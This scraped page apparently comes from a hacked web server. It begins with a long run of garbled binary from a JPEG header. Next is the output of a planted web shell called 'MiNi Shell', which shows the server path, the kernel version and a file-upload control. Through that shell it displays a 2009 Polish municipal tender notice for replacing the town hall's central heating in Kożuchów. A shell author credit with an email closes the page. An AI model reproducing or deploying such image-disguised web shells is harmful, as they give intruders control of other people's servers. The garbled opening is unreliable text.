JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20091009/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20091009/353854-N-2009.html

<p class="kh_header"><b>Kożuchów: WYMIANA INSTALACJI C.O. W BUDYNKU URZĘDU MIEJSKIEGO W KOŻUCHOWIE UL. RYNEK 1A</b><br>
<b>Numer ogłoszenia: 353854 - 2009; data zamieszczenia: 09.10.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Urząd Miejski , ul. Rynek 1a, 67-120 Kożuchów, woj. lubuskie, tel. 068 3552094 do 97, faks (068) 355 28 68.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.kozuchow.prv.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> WYMIANA INSTALACJI C.O. W BUDYNKU URZĘDU MIEJSKIEGO W KOŻUCHOWIE UL. RYNEK 1A.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 3.2Cel zamówienia
Celem zamówienia jest wymiana wewnętrznej instalacji c. o. w budynku Urzędu Miejskiego w Kożuchowie, ul. Rynek 1 A

3.3 Przedmiot zamówienia obejmuje między innymi:
3.3.1 demontaż istniejącej instalacji centralnego ogrzewania.
3.3.2 wykonanie nowej instalacji centralnego ogrzewania wg projektu budowlanego, istniejący kocioł typu Maciek o mocy 160kW nie podlega wymianie.
3.3.3 wykonanie robót ogólnobudowlanych i towarzyszących związanych z wymianą instalacji centralnego ogrzewania.
3.3.4 Wykonawca zawierający Umowę jest zobligowany w przypadku awarii w okresie grzewczym 2009/2010 do podjęcia niezwłocznych działań polegających na wymianie tej części lub niezbędnej naprawie.

Wykonawca udziela  gwarancji jakości na okres 36 miesięcy na wykonane roboty od daty odbioru końcowego.
3.3.6 W ramach realizacji zamówienia Wykonawca zobowiązany będzie między innymi do opracowania i wykonania:
a) Planu Bezpieczeństwa i Ochrony Zdrowia (BiOZ), zgodnie z informacją BiOZ zawartą w projekcie budowlanym i ST,
b)  dokumentacji powykonawczej obiektu w 2 egzemplarzach,
c) zabezpieczenia i oznakowania terenu budowy w dzień i w nocy,
d) ustanowienie kierownika budowy,
e) innych prac wymienionych w projekcie budowlanym i Specyfikacjach Technicznych,
Koszt powyższych opracowań poniesie Wykonawca. 
3.4 Roboty budowlane, które będą prowadzone opisane są szczegółowo za pomocą dokumentacji projektowej  na którą składają się następujące opracowania:
1)Projekt budowlany wymiany instalacji C.O. w budynku Ratusza w Kożuchowie
2)Specyfikacje Techniczne

Powyższa dokumentacja została opracowana przez: 
PROJEKTOWANIE I NADZÓR
Grzegorz Kęsicki
ul. Strumykowa 23d/14
65-101 Zielona Góra

4.1 Termin wykonania całego zamówienia : do 31.05.2010 r. : 
4.1.1 I ETAP -  demontaż istniejącej instalacji c.o. i montaż grzejników oraz instalacji w Sali Radnych (pokój nr 12, I Piętro) wraz z wyprowadzeniem nowego pionu i podłączeniem do istniejącego kotła, Wykonawca wykona do 25 listopada 2009 roku!
4.1.2 II ETAP - demontaż istniejącej i wykonanie nowej instalacji na Parterze, I (z wyłączeniem Sali Radnych), II i III Piętrze budynku Wykonawca wykona do 31.05.2010 r..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 45.33.11.00-7.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.05.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> 8.1 Wykonawca jest zobowiązany do wniesienia wadium w wysokości 4 000, 00zł(cztery tysięce złotych).
8.2 Wadium musi być wniesione przed upływem terminu składania ofert w jednej lub kilku następujących formach:
1) pieniądzu, przelew na rachunek bankowy Zamawiającego:

B.S. Kożuchów GMINA KOŻUCHÓW
49967300070000000010070006

2) poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo - kredytowej,
z tym, że poręczenie kasy jest zawsze poręczeniem pieniężnym;
3) gwarancjach bankowych;
4) gwarancjach ubezpieczeniowych;
5) poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2
ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości
(Dz. U. Nr 109, poz. 1158, z późn. zm.).

8.3 Wadium wniesione w pieniądzu Zamawiający przechowuje na rachunku bankowym.
8.4 Wadium obejmuje cały okres związania ofertą.
8.5 Wykonawca, który nie wniesie wadium w wysokości określonej w pkt. 8.1 albo w formie lub formach, o których mowa w pkt. 8. 2 zostanie wykluczony z postępowania.
8.6 Zamawiający zwraca niezwłocznie wadium, jeżeli:
1) upłynął termin związania ofertą;
2) zawarto umowę w sprawie zamówienia publicznego i wniesiono zabezpieczenie należytego wykonania tej umowy;
3) zamawiający unieważnił postępowanie o udzielenie zamówienia, a protesty zostały ostatecznie rozstrzygnięte lub upłynął termin do ich wnoszenia.
8.7 Z zastrzeżeniem ust. 4a(art. 46 Pzp) zamawiający zwraca niezwłocznie wadium, na wniosek wykonawcy:
1) który wycofał ofertę przed upływem terminu składania ofert;
2) który został wykluczony z postępowania;
3) którego oferta została odrzucona.
8.8 Złożenie wniosku o zwrot wadium jest równoznaczne ze zrzeczeniem się prawa do wniesienia protestu.
8.9 Zamawiający żąda ponownego wniesienia wadium przez wykonawców, którym zwrócono wadium na podstawie pkt 8.7 ust. 2) i 3), jeżeli w wyniku ostatecznego rozstrzygnięcia protestu unieważniono czynność wykluczenia wykonawcy lub odrzucenia oferty. Wykonawcy wnoszą wadium w terminie określonym przez zamawiającego.
8.10 Jeżeli wadium wniesiono w pieniądzu, zamawiający zwraca je wraz z odsetkami wynikającymi z umowy rachunku bankowego, na którym było ono przechowywane, pomniejszone o koszty prowadzenia rachunku bankowego oraz prowizji bankowej za przelew pieniędzy na rachunek bankowy wskazany przez wykonawcę.
8.11 Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli wykonawca w odpowiedzi na wezwanie, o którym mowa w art. 26 ust. 3, nie złożył dokumentów lub oświadczeń, o których mowa w art. 25 ust. 1, lub pełnomocnictw, chyba że udowodni, że wynika to z przyczyn nie leżących po jego stronie.
8.12 Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli wykonawca, którego oferta została wybrana:
1) odmówił podpisania umowy w sprawie zamówienia publicznego na warunkach określonych w ofercie;
2) nie wniósł wymaganego zabezpieczenia należytego wykonania umowy;
3) zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe z przyczyn leżących po stronie wykonawcy.<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 5.1.  O  zamówienie  publiczne  mogą  ubiegać  się  Wykonawcy,  którzy  spełniają  niżej wymienione warunki :  
5.1.1.  Posiadają  uprawnienia  do  wykonywania  działalności  lub  czynności  jeżeli  ustawy nakładają obowiązek posiadania takich uprawnień.   

5.1.2.  Posiadają  niezbędną  wiedzę  i  doświadczenie  oraz  dysponują  potencjałem technicznym i osobami zdolnymi do wykonania zamówienia, w szczególności: 

5.1.2.1.  Dysponują  osobami  posiadającymi  prawo  do  wykonywania  samodzielnych  funkcji technicznych w budownictwie do kierowania robotami budowlanymi wpisanymi na okręgową listę członków samorządu zawodowego - Okręgowej  Izby  Inżynierów, które będą posiadały uprawnienia budowlane w specjalnościach: 
- instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, wodociągowych i kanalizacyjnych bez ograniczeń; 
lub  przedstawią  pisemne  zobowiązanie  innych  podmiotów  do  udostępnienia  ww osoby.  

5.1.2.2.  Wykonali  w  ramach  jednej  umowy,  w  okresie  ostatnich trzech lat  przed  dniem wszczęcia  postępowania,  a  jeśli  okres  prowadzenia  działalności  jest  krótszy,  to  w  tym okresie,  jedną  robotę  budowlaną  (zakończoną)  obejmującą  swoim  zakresem  wymianę instalacji c. o.o  wartości nie mniejszej niż 100.000,00 zł. brutto
5.1.3. Znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia, w szczególności: 
- posiadają ubezpieczenie od odpowiedzialności cywilnej w zakresie prowadzonej działalności na sumę ubezpieczenia nie mniejszą niż 500 000,00 zł 
Uwaga: Wykonawcy występujący wspólnie razem mogą spełniać warunek z tym, że każdy z nich musi posiadać ubezpieczenie na kwotę minimum 250.000,00 zł.

5.1.4. Nie podlegają wykluczeniu z postępowania o udzielenie zamówienia zgodnie z art. 24. ustawy. 
5.1.5. Wniosą wadium..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 6.1  Zawartość oferty:
6.1.1 Wypełniona Oferta wraz z załącznikami (zał. nr 1 do SIWZ) 
6.1.2 Oświadczenia o przyjęciu funkcji kierownika budowy oraz robót w przypadku wyboru oferty dla osób wskazanych na stanowisku kierownika budowy oraz robót budowlanych w załączniku nr 3 Oferty.
6.1.3  Harmonogram-rzeczowo-terminowo-finansowy sporządzony zgodnie z pkt.12.4 SIWZ
6.1.4 W  celu  wykazania  spełnienia  warunków  udziału  w  Postępowaniu,  każdy  z Wykonawców powinien przedłożyć następujące dokumenty i oświadczenia:  
a) Oświadczenie o spełnieniu warunków art. 22 ust.1 pkt.1-4 oraz, że Wykonawca nie podlega wykluczeniu z ubiegania się o udzielenie zamówienia publicznego zgodnie z art. 24 Ustawy Prawo zamówień publicznych zwanej dalej Ustawą  ( załącznik Nr 1 do Oferty)*; 
b)  aktualny  odpis  z  właściwego  rejestru  albo  aktualne  zaświadczenie  o  wpisie  do ewidencji  działalności  gospodarczej,  jeżeli  odrębne  przepisy  wymagają  wpisu  do rejestru  lub  zgłoszenia  do ewidencji  działalności  gospodarczej,  wystawione  nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert*; 
c) aktualne zaświadczenie właściwego Naczelnika Skarbowego oraz właściwego oddziału Zakładu  Ubezpieczeń  Społecznych  potwierdzających  odpowiednio,  że Wykonawca nie zalega z opłacaniem podatków, opłat oraz składek   na ubezpieczenie zdrowotne  i społeczne, lub zaświadczeń, że uzyskał przewidziane prawem zwolnienie, odroczenie lub  rozłożenie  na  raty  zaległych  płatności  lub  wstrzymanie  w  całości  wykonania decyzji właściwego organu, wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert*;
f) wykaz wykonanych przed wszczęciem niniejszego postępowania w okresie ostatnich trzech lat robót budowlanych, a jeżeli okres prowadzenia działalności jest krótszy - w tym  okresie,  odpowiadających  swoim  rodzajem  i  wartością  robotom  budowlanym stanowiącym  przedmiot  zamówienia,  z  podaniem  ich  wartości  oraz  daty  i  miejsca wykonania  oraz  załączeniem  dokumentów  potwierdzających,  że  roboty  te  zostały wykonane  należycie , zgodnie z warunkiem określonym w pkt. 5.1.2.2 -(załącznik Nr 2 do Oferty); 
g) wykaz osób przewidzianych do realizacji zamówienia (załącznik Nr 3 do Oferty) wraz z dokumentami  stwierdzające,  ze  osoby  które  będą  kierowały  robotami  budowlanymi posiadają  wymagane  uprawnienia  do  wykonywania  samodzielnych  funkcji  technicznych  w  budownictwie  -  uprawnienia  budowlane  do  kierowania  robotami  budowlanymi  w specjalnościach określonych w warunku oraz kopią aktualnych zaświadczeń odpowiedniego organu samorządu zawodowego o wymaganym ubezpieczeniu od odpowiedzialności cywilnej (kopie potwierdzone za zgodność z oryginałem);
h) Pisemne zobowiązanie innych podmiotów do udostępnienia ww. osoby w przypadku gdy Wykonawca nie dysponuje osobą określoną w pkt. 5.1.2.1 SIWZ
i)Polisę  lub  inny  dokument  potwierdzający,  że  Wykonawca  jest  ubezpieczony  od odpowiedzialności cywilnej w zakresie prowadzonej działalności na kwotę minimum 500.000,0zł;  Uwaga: Wykonawcy występujący wspólnie razem mogą spełniać warunek z tym, że każdy z nich musi posiadać ubezpieczenie na kwotę minimum 250.000,00 zł.
j) zaakceptowany (podpisany) wzór umowy;
Umowa musi być podpisana w taki sposób, by prawnie zobowiązywała wszystkich wykonawców występujących wspólnie.
k) dowód wniesienia wadium;
Wadium wnoszone w formie innej niż pieniądz (art. 45 ust. 6 pkt 2-5 ustawy Prawo zamówień publicznych) musi być złożone w formie oryginału.

 Podmioty  występujące  wspólnie upoważnią  jednego  spośród  siebie,  jako  przedstawiciela  pozostałych  (lidera),  przy czym  upoważnienie  musi  być  udokumentowane  pełnomocnictwem  podpisanym  przez upełnomocnionych  przedstawicieli  wszystkich  pozostałych  przedsiębiorców.  Wszelka korespondencja  oraz  rozliczenia  dokonywane  będą  wyłącznie  z  przedsiębiorcą występującym jako reprezentant pozostałych (liderem)..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.bip.kozuchow.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski w Kozuchowie ul. Rynek 1A, 67-120 Kozuchów, pokój nr 26.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 30.10.2009 godzina 10:00, miejsce: Urząd Miejski w Kozuchowie ul. Rynek 1A, 67-120 Kozuchów, sekretariat.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com